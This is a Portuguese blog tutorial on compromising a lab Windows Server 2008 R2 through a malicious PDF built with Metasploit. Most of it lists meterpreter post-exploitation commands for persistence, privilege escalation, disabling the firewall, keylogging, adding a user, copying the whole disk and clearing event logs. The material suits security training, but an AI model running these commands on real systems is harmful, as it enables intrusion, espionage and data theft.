Foto de perfil

Explorando Vulnerabilidades com o Kali Linux 2

Nesse artigo, iremos verificar o poder da ferramenta metasploit, para explorar uma vulnerabilidade em um servidor Windows Server 2008 R2.

Isso demonstra também que não devemos deixar softwares desatualizados em um servidor , e também, não instalar softwares desnecessários.

 

1 – Primeiramente devemos configurar o ambiente. Vamos começar usando o Kali Linux 2 que será o host atacante. Configurar a máquina virtual , sua placa de rede, como rede interna.

No vídeo abaixo vemos essa configuração.

2 – A segunda parte será configurar o servidor Windows 2008 R2. Alterar os recursos utilizados por este servidor. Por exemplo, eu aumentei a memória para 4GB de RAM e 2 processadores. Iremos também instalar os componentes adicionais, alterar o IP, o hostname, o grupo, desabilitar o firewall , e instalar o servidor web IIS e a rola FTP.

Após realizar essa etapas vamos compartilhar um diretória com a VM para poder transferir arquivos, como o Adobe Acrobat Reader 9.4. É antigo , justamente para demonstrar o perigo de softwares desatualizados. Vejamos essas configurações no vídeo abaixo:

 

3 – Agora vamos iniciar o metasploit e criar um arquivo malicioso, nesse caso um PDF, que será executado no host vítima (Windows Server 2008 R2). Em seguida, vamos disponibilizar esse arquivo em um servidor web no próprio Kali , abrir um listener , que ficará aguardando a conexão do host vítima.

Na máquina vítima temos que abrir o arquivo malicioso. Esse procedimento é visto agora:

4 – Agora após ter o controle da máquina Windows 2008 Server, vamos brincar com o metasploit.

Vou exibir agora alguns comandos que podem ser utilizados com o meterpreter .

Manter conexão aberta, mesmo que o alvo seja reiniciado

meterpreter> run persistence -X

Promovendo privilégios

meterpreter> getuid

meterpreter> getsystem

meterpreter> getuid

Levantando informações

meterpreter> sysinfo

meterpreter> run get_env

meterpreter> run get_application_list

Desativando firewall

meterpreter> shell

C:\Windows\System32> netsh firewall set opmode disable

C:\Windows\System32> exit

Capturando a tela (screenshot)

meterpreter> getpid

meterpreter> ps

meterpreter> use -l

meterpreter> use espia

meterpreter> screenshot

meterpreter> screengrab

Ativando keilogger

meterpreter> keyscan_start

meterpreter> keyscan_dump

meterpreter> keyscan_stop

Enumerando informações

meterpreter> run winenum

meterpreter> run scraper (copia entradas do registro)

meterpreter> run prefetchtool

Inserindo informações no arquivo de hosts do windows

meterpreter > edit c:\\Windows\\System32\\drivers\\etc\\hosts

Realizando varredura na rede do alvo

meterpreter > run arp_scanner -i

meterpreter > run arp_scanner -r  172.16.1.0/24

Criando usuário

meterpreter > shell

C:\Windows\System32> net user andre changeme /add

C:\Windows\System32> net user

C:\Windows\System32> exit

Baixando o HD da máquina vítima

meterpreter > download -r c:\\

Enviando arquivo para o alvo

meterpreter > upload /root/tcpdump.exe c:\\windows\\System32

meterpreter > shell

meterpreter > tcpdump -w saida.pcap

meterpreter > ps

meterpreter > kill NUMERO_PROCESSO

meterpreter > download c:\\saida.pcap

Apagando os rastros

meterpreter > clearev

31 de agosto de 2016

No comments, be the first one to comment !

Deixe uma resposta

Todos os direitos reservados.

Login

REGISTRO

Crie uma conta
Criar uma conta Voltar ao login/registro